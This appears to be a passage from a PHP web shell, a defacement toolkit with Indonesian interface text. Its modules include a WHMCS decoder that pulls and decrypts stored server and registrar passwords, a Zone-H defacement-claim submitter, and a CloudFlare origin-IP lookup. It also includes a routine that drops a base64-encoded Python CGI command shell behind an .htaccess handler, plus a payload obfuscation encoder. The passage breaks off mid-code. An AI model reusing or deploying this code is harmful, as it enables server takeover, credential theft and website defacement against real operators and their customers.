<tr>\r\n\t\t<td>Port start</td>\r\n\t\t<td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="start" value="0"/></td>\r\n   </tr>\r\n\t<tr><td>Port end</td>\r\n\t\t<td><input type="text" class="inputz"  style="width:220px;color:#00ff00;" name="end" value="5000"/></td>\r\n   </tr><td><input class="inputzbut" type="submit" style="color:#00ff00" value="Scan Ports" />\r\n   </td></form></center></table>\';\r\n    }\r\n}\r\n/////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'hash\'))\r\n    {\r\n$submit= $_POST[\'enter\'];\r\nif (isset($submit)) {\r\n$pass = $_POST[\'password\']; // password\r\n$salt = \'}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN\'; // random string\r\n$hash = md5($pass); // md5 hash #1\r\n$md4 = hash("md4",$pass);\r\n$hash_md5 = md5($salt.$pass); // md5 hash with salt #2\r\n$hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3\r\n$hash1 = sha1($pass); // sha1 hash #4\r\n$sha256 = hash("sha256",$text);\r\n$hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5\r\n$hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6\r\n}\r\necho \'<form action="" method="post"><b><table class=tabnet>\';\r\necho \'<tr><th colspan="2">Password Hash</th></center></tr>\';\r\necho \'<tr><td><b>masukan kata yang ingin di encrypt:</b></td>\';\r\necho \'<td><input class="inputz" type="text" name="password" size="40" />\';\r\necho \'<input class="inputzbut" type="submit" name="enter" value="hash" />\';\r\necho \'</td></tr><br>\';\r\necho \'<tr><th colspan="2">Hasil Hash</th></center></tr>\';\r\necho \'<tr><td>Original Password</td><td><input class=inputz type=text size=50 value=\'.$pass.\'></td></tr><br><br>\';\r\necho \'<tr><td>MD5</td><td><input class=inputz type=text size=50 value=\'.$hash.\'></td></tr><br><br>\';\r\necho \'<tr><td>MD4</td><td><input class=inputz type=text size=50 value=\'.$md4.\'></td></tr><br><br>\';\r\necho \'<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value=\'.$hash_md5.\'></td></tr><br><br>\';\r\necho \'<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value=\'.$hash_md5_double.\'></td></tr><br><br>\';\r\necho \'<tr><td>Sha1</td><td><input class=inputz type=text size=50 value=\'.$hash1.\'></td></tr><br><br>\';\r\necho \'<tr><td>Sha256</td><td><input class=inputz type=text size=50 value=\'.$sha256.\'></td></tr><br><br>\';\r\necho \'<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value=\'.$hash1_sha1.\'></td></tr><br><br>\';\r\necho \'<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value=\'.$hash1_sha1_double.\'></td></tr><br><br></table>\'; \r\n}\r\n\r\n/////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'whmcs\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=whmcs" method="post">\r\n\r\n<?php\r\n\r\nfunction decrypt ($string,$cc_encryption_hash)\r\n{\r\n    $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);\r\n    $hash_key = _hash ($key);\r\n    $hash_length = strlen ($hash_key);\r\n    $string = base64_decode ($string);\r\n    $tmp_iv = substr ($string, 0, $hash_length);\r\n    $string = substr ($string, $hash_length, strlen ($string) - $hash_length);\r\n    $iv = $out = \'\';\r\n    $c = 0;\r\n    while ($c < $hash_length)\r\n    {\r\n        $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));\r\n        ++$c;\r\n    }\r\n    $key = $iv;\r\n    $c = 0;\r\n    while ($c < strlen ($string))\r\n    {\r\n        if (($c != 0 AND $c % $hash_length == 0))\r\n        {\r\n            $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));\r\n        }\r\n        $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));\r\n        ++$c;\r\n    }\r\n    return $out;\r\n}\r\n\r\nfunction _hash ($string)\r\n{\r\n    if (function_exists (\'sha1\'))\r\n    {\r\n        $hash = sha1 ($string);\r\n    }\r\n    else\r\n    {\r\n        $hash = md5 ($string);\r\n    }\r\n    $out = \'\';\r\n    $c = 0;\r\n    while ($c < strlen ($hash))\r\n    {\r\n        $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));\r\n        $c += 2;\r\n    }\r\n    return $out;\r\n}\r\n\r\necho "\r\n<br><center><font size=\'5\' color=\'#00ff00\'><b>-=[ WHMCS Decoder ]=-</b></font></center>\r\n<center>\r\n<br>\r\n\r\n<FORM action=\'\'  method=\'post\'>\r\n<input type=\'hidden\' name=\'form_action\' value=\'2\'>\r\n<br>\r\n<table class=tabnet style=width:320px;padding:0 1px;>\r\n<tr><th colspan=2>WHMCS Decoder</th></tr> \r\n<tr><td>db_host </td><td><input type=\'text\' style=\'color:#00ff00;background-color:\' class=\'inputz\' size=\'38\' name=\'db_host\' value=\'localhost\'></td></tr>\r\n<tr><td>db_username </td><td><input type=\'text\' style=\'color:#00ff00;background-color:\' class=\'inputz\' size=\'38\' name=\'db_username\' value=\'\'></td></tr>\r\n<tr><td>db_password</td><td><input type=\'text\' style=\'color:#00ff00;background-color:\' class=\'inputz\' size=\'38\' name=\'db_password\' value=\'\'></td></tr>\r\n<tr><td>db_name</td><td><input type=\'text\' style=\'color:#00ff00;background-color:\' class=\'inputz\' size=\'38\' name=\'db_name\' value=\'\'></td></tr>\r\n<tr><td>cc_encryption_hash</td><td><input style=\'color:#00ff00;background-color:\' type=\'text\' class=\'inputz\' size=\'38\' name=\'cc_encryption_hash\' value=\'\'></td></tr>\r\n<td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class=\'inputzbut\' type=\'submit\' style=\'color:#00ff00;background-color:\'  value=\'Submit\' name=\'Submit\'></td>\r\n</table>\r\n</FORM>\r\n</center>\r\n";\r\n\r\n if($_POST[\'form_action\'] == 2 )\r\n {\r\n //include($file);\r\n $db_host=($_POST[\'db_host\']);\r\n $db_username=($_POST[\'db_username\']);\r\n $db_password=($_POST[\'db_password\']);\r\n $db_name=($_POST[\'db_name\']);\r\n $cc_encryption_hash=($_POST[\'cc_encryption_hash\']);\r\n\r\n\r\n\r\n    $link=mysql_connect($db_host,$db_username,$db_password) ;\r\n        mysql_select_db($db_name,$link) ;\r\n$query = mysql_query("SELECT * FROM tblservers");\r\nwhile($v = mysql_fetch_array($query)) {\r\n$ipaddress = $v[\'ipaddress\'];\r\n$username = $v[\'username\'];\r\n$type = $v[\'type\'];\r\n$active = $v[\'active\'];\r\n$hostname = $v[\'hostname\'];\r\necho("<center><table border=\'1\'>");\r\n$password = decrypt ($v[\'password\'], $cc_encryption_hash);\r\necho("<tr><td>Type</td><td>$type</td></tr>");\r\necho("<tr><td>Active</td><td>$active</td></tr>");\r\necho("<tr><td>Hostname</td><td>$hostname</td></tr>");\r\necho("<tr><td>Ip</td><td>$ipaddress</td></tr>");\r\necho("<tr><td>Username</td><td>$username</td></tr>");\r\necho("<tr><td>Password</td><td>$password</td></tr>");\r\n\r\necho "</table><br><br></center>";\r\n}\r\n\r\n    $link=mysql_connect($db_host,$db_username,$db_password) ;\r\n        mysql_select_db($db_name,$link) ;\r\n$query = mysql_query("SELECT * FROM tblregistrars");\r\necho("<center>Domain Reseller <br><table class=tabnet border=\'1\'>");\r\necho("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");\r\nwhile($v = mysql_fetch_array($query)) {\r\n$registrar     = $v[\'registrar\'];\r\n$setting = $v[\'setting\'];\r\n$value = decrypt ($v[\'value\'], $cc_encryption_hash);\r\nif ($value=="") {\r\n$value=0;\r\n}\r\n$password = decrypt ($v[\'password\'], $cc_encryption_hash);\r\necho("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");\r\n}\r\n}\r\n}\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'zone\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=zone" method="post">\r\n\r\n<br><br><center>\r\n<!-- Zone-H -->\r\n<form action="" method=\'POST\'><table><table class=\'tabnet\'><tr>\r\n<td style=\'background-color:#0000;padding-left:10px;\'><tr><tr><th colspan="2"><h2>Zone-H Defacer</h2></th></tr></td></tr><tr><td height=\'45\' colspan=\'2\'><form method="post">\r\n<input type="text" class="inputz" name="defacer" value="Nama Defacer" />\r\n<select name="hackmode" class="inputz" >\r\n<option >------------------------Pilih Salah Satu------------------------</option>\r\n<option value="1">known vulnerability (i.e. unpatched system)</option>\r\n<option value="2" >undisclosed (new) vulnerability</option>\r\n<option value="3" >configuration / admin. mistake</option>\r\n<option value="4" >brute force attack</option>\r\n<option value="5" >social engineering</option>\r\n<option value="6" >Web Server intrusion</option>\r\n<option value="7" >Web Server external module intrusion</option>\r\n<option value="8" >Mail Server intrusion</option>\r\n<option value="9" >FTP Server intrusion</option>\r\n<option value="10" >SSH Server intrusion</option>\r\n<option value="11" >Telnet Server intrusion</option>\r\n<option value="12" >RPC Server intrusion</option>\r\n<option value="13" >Shares misconfiguration</option>\r\n<option value="14" >Other Server intrusion</option>\r\n<option value="15" >SQL Injection</option>\r\n<option value="16" >URL Poisoning</option>\r\n<option value="17" >File Inclusion</option>\r\n<option value="18" >Other Web Application bug</option>\r\n<option value="19" >Remote administrative panel access bruteforcing</option>\r\n<option value="20" >Remote administrative panel access password guessing</option>\r\n<option value="21" >Remote administrative panel access social engineering</option>\r\n<option value="22" >Attack against administrator(password stealing/sniffing)</option>\r\n<option value="23" >Access credentials through Man In the Middle attack</option>\r\n<option value="24" >Remote service password guessing</option>\r\n<option value="25" >Remote service password bruteforce</option>\r\n<option value="26" >Rerouting after attacking the Firewall</option>\r\n<option value="27" >Rerouting after attacking the Router</option>\r\n<option value="28" >DNS attack through social engineering</option>\r\n<option value="29" >DNS attack through cache poisoning</option>\r\n<option value="30" >Not available</option>\r\n</select>\r\n\r\n<select name="reason" class="inputz" >\r\n<option >-------------Pilih Salah Satu---------------</option>\r\n<option value="1" >Heh...just for fun!</option>\r\n<option value="2" >Revenge against that website</option>\r\n<option value="3" >Political reasons</option>\r\n<option value="4" >As a challenge</option>\r\n<option value="5" >I just want to be the best defacer</option>\r\n<option value="6" >Patriotism</option>\r\n<option value="7" >Not available</option>\r\n</select>\r\n<input type="hidden" name="action" value="zone">\r\n<center><textarea style="background:black;outline:none;" name="domain" cols="116" rows="9" id="domains">List Of Domains</textarea>\r\n<br /><input class=\'inputzbut\' type="submit" value="Send Now !" name="SendNowToZoneH" /><br></center></table>\r\n</form></td></tr></table></form>\r\n<!-- End Of Zone-H -->\r\n</td></center><br><br>\r\n\r\n<?php\r\necho \'<center>\';\r\n\tob_start();\r\n\t$sub = get_loaded_extensions();\r\n\tif(!in_array("curl", $sub)){die(\'[-] Curl Is Not Supported !! \');}\r\n\t$hacker = $_POST[\'defacer\'];\r\n\t$method = $_POST[\'hackmode\'];\r\n\t$neden = $_POST[\'reason\'];\r\n\t$site = $_POST[\'domain\'];\r\n\t\r\n\tif (empty($hacker)){die ("[-] You Must Fill the Attacker name !");}\r\n\telseif($method == "--------SELECT--------") {die("[-] You Must Select The Method !");}\r\n\telseif($neden == "--------SELECT--------") {die("[-] You Must Select The Reason");}\r\n\telseif(empty($site)) {die("[-] You Must Inter the Sites List ! ");}\r\n\t$i = 0;\r\n\t$sites = explode("\\n", $site);\r\n\twhile($i < count($sites)) \r\n\t{\r\n\t\tif(substr($sites[$i], 0, 4) != "http") {$sites[$i] = "http://".$sites[$i];}\r\n\t\tZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);\r\n\t\techo "Site : ".$sites[$i]." Defaced !\\n";\r\n\t\t++$i;\r\n\t}\r\n\techo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";\r\n\r\n\techo \'</center>\';\r\n}\r\n\r\n/////////////////////////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'bypass-cf\'))\r\n{\t\r\necho \'\r\n<form method="POST"><br><br>\r\n<center><p align="center" dir="ltr"><b><font size="5" face="Tahoma">+--=[ Bypass\r\n<font color="#CC0000">CloudFlare</font> ]=--+</font></b></p>\r\n<select class="inputz" name="krz">\r\n\t<option>ftp</option>\r\n\t\t<option>direct-conntect</option>\r\n\t\t\t<option>webmail</option>\r\n\t\t\t\t<option>cpanel</option>\r\n</select>\r\n<input class="inputz" type="text" name="target" value="url">\r\n<input class="inputzbut" type="submit" value="Bypass"></center>\r\n\r\n\';\r\n\r\n$target = $_POST[\'target\'];\r\n# Bypass From FTP\r\nif($_POST[\'krz\'] == "ftp") {\r\n$ftp = gethostbyname("ftp."."$target");\r\necho "<br><p align=\'center\' dir=\'ltr\'><font face=\'Tahoma\' size=\'2\' color=\'#00ff00\'>Correct \r\nip is : </font><font face=\'Tahoma\' size=\'2\' color=\'#F68B1F\'>$ftp</font></p>";\r\n} \r\n# Bypass From Direct-Connect\r\nif($_POST[\'krz\'] == "direct-conntect") {\r\n$direct = gethostbyname("direct-connect."."$target");\r\necho "<br><p align=\'center\' dir=\'ltr\'><font face=\'Tahoma\' size=\'2\' color=\'#00ff00\'>Correct \r\nip is : </font><font face=\'Tahoma\' size=\'2\' color=\'#F68B1F\'>$direct</font></p>";\r\n}\r\n# Bypass From Webmail\r\nif($_POST[\'krz\'] == "webmail") {\r\n$web = gethostbyname("webmail."."$target");\r\necho "<br><p align=\'center\' dir=\'ltr\'><font face=\'Tahoma\' size=\'2\' color=\'#00ff00\'>Correct \r\nip is : </font><font face=\'Tahoma\' size=\'2\' color=\'#F68B1F\'>$web</font></p>";\r\n}\r\n# Bypass From Cpanel\r\nif($_POST[\'krz\'] == "cpanel") {\r\n$cpanel = gethostbyname("cpanel."."$target");\r\necho "<br><p align=\'center\' dir=\'ltr\'><font face=\'Tahoma\' size=\'2\' color=\'#00ff00\'>Correct \r\nip is : </font><font face=\'Tahoma\' size=\'2\' color=\'#F68B1F\'>$cpanel</font></p>";\r\n}\r\n}\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\n\r\n\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'hashid\')) {\r\nif(isset($_POST[\'gethash\'])){\r\n\t\t$hash = $_POST[\'hash\'];\r\n\t\tif(strlen($hash)==32){\r\n\t\t\t$hashresult = "MD5 Hash";\r\n\t\t}elseif(strlen($hash)==40){\r\n\t\t\t$hashresult = "SHA-1 Hash/ /MySQL5 Hash";\r\n\t\t}elseif(strlen($hash)==13){\r\n\t\t\t$hashresult = "DES(Unix) Hash";\r\n\t\t}elseif(strlen($hash)==16){\r\n\t\t\t$hashresult = "MySQL Hash / /DES(Oracle Hash)";\r\n\t\t}elseif(strlen($hash)==41){\r\n\t\t\t$GetHashChar = substr($hash, 40);\r\n\t\t\tif($GetHashChar == "*"){\r\n\t\t\t\t$hashresult = "MySQL5 Hash"; \r\n\t\t\t}\t\r\n\t\t}elseif(strlen($hash)==64){\r\n\t\t\t$hashresult = "SHA-256 Hash";\r\n\t\t}elseif(strlen($hash)==96){\r\n\t\t\t$hashresult = "SHA-384 Hash";\r\n\t\t}elseif(strlen($hash)==128){\r\n\t\t\t$hashresult = "SHA-512 Hash";\r\n\t\t}elseif(strlen($hash)==34){\r\n\t\t\tif(strstr($hash, \'$1$\')){\r\n\t\t\t\t$hashresult = "MD5(Unix) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==37){\r\n\t\t\tif(strstr($hash, \'$apr1$\')){\r\n\t\t\t\t$hashresult = "MD5(APR) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==34){\r\n\t\t\tif(strstr($hash, \'$H$\')){\r\n\t\t\t\t$hashresult = "MD5(phpBB3) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==34){\r\n\t\t\tif(strstr($hash, \'$P$\')){\r\n\t\t\t\t$hashresult = "MD5(Wordpress) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==39){\r\n\t\t\tif(strstr($hash, \'$5$\')){\r\n\t\t\t\t$hashresult = "SHA-256(Unix) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==39){\r\n\t\t\tif(strstr($hash, \'$6$\')){\r\n\t\t\t\t$hashresult = "SHA-512(Unix) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==24){\r\n\t\t\tif(strstr($hash, \'==\')){\r\n\t\t\t\t$hashresult = "MD5(Base-64) Hash";\r\n\t\t\t} \t\r\n\t\t}else{\r\n\t\t\t$hashresult = "Hash type not found";\r\n\t\t}\r\n\t}else{\r\n\t\t$hashresult = "Not Hash Entered";\r\n\t}\r\n\t\r\n\t?>\r\n\t<center><br><Br><br>\r\n\t\r\n\t\t<form action="" method="POST">\r\n\t\t<tr>\r\n\t\t<table class="tabnet">\r\n\t\t<th colspan="5">Hash Identification</th>\r\n\t\t<tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td>\t<td><input type="text" name="hash" size=\'60\' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>\r\n\t\t<tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>\r\n\t</table></tr></form>\r\n\t</center>\r\n\t\r\n\t<?php\r\n }\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'python\')) { \r\necho "<center/><br/><b>\r\n +--==[ python  Bypass Exploit ]==--+ \r\n </b><br><br>";\r\n \r\n \r\n    mkdir(\'python\', 0755);\r\n    chdir(\'python\');\r\n        $kokdosya = ".htaccess";\r\n        $dosya_adi = "$kokdosya";\r\n        $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;&#305;lamad&#305;!");\r\n        $metin = "AddHandler cgi-script .izo";    \r\n        fwrite ( $dosya , $metin ) ;\r\n        fclose ($dosya);\r\n$pythonp = \'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB\r\nIHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD\r\nb3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg\r\ncmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv\r\nciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg\r\nY29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg\r\nZm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv\r\nYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g\r\nZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5\r\nOgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y\r\ndCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz\r\ndHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy\r\nb20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs\r\naW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt\r\nc2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw\r\nNCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg\r\nPSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F\r\nVEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl\r\ncwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi\r\nIlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g\r\naXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs\r\ndWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu\r\nZy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g\r\nd2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg\r\naXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg\r\nICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk\r\nXSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt\r\nW2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv\r\ncm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg\r\nPSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y\r\nIGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg\r\nICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z\r\naGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+\r\nCjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48\r\nST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl\r\ncnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs\r\nICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg\r\nQ29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr\r\nIHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1\r\ndCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5\r\nZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n\r\nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj\r\ncmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6\r\nIHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg\r\nICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs\r\nYW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt\r\nKFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt\r\naGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+\r\nPEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS\r\nPicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg\r\nICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg\r\nICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv\r\ndXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy\r\naW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv\r\nbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv\r\nbW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ\r\nTygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh\r\nbHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg\r\nICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD\r\nSEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0\r\nZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw\r\ncm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi\';\r\n\r\n$file = fopen("python.izo" ,"w+");\r\n$write = fwrite ($file ,base64_decode($pythonp));\r\nfclose($file);\r\n    chmod("python.izo",0755);\r\n   echo " <iframe src=python/python.izo width=96% height=76% frameborder=0></iframe>\r\n \r\n </div>"; }\r\n\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'string\')){\r\n$text = $_POST[\'code\'];\r\n?><center><br><br><b>+--=[ Script Encode & Decode ]=--+</b><br><br>\r\n<form method="post"><br><br><br>\r\n<textarea class=\'inputz\' cols=80 rows=10 name="code"></textarea><br><br>\r\n<select class=\'inputz\' size="1" name="ope">\r\n<option value="base64">Base64</option>\r\n<option value="gzinflate">str_rot13 - gzinflate - base64</option>\r\n<option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>\r\n</select>&nbsp;<input class=\'inputzbut\' type=\'submit\' name=\'submit\' value=\'Encrypt\'>\r\n<input class=\'inputzbut\' type=\'submit\' name=\'submits\' value=\'Decrypt\'>\r\n</form>\r\n\r\n<?php \r\n$submit = $_POST[\'submit\'];\r\nif (isset($submit)){\r\n$op = $_POST["ope"];\r\nswitch ($op) {case \'base64\': $codi=base64_encode($text);\r\nbreak;case \'str\' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));\r\nbreak;case \'gzinflate\' : $codi=base64_encode(gzdeflate(str_rot13($text)));\r\nbreak;default:break;}}\r\n\r\n$submit = $_POST[\'submits\'];\r\nif 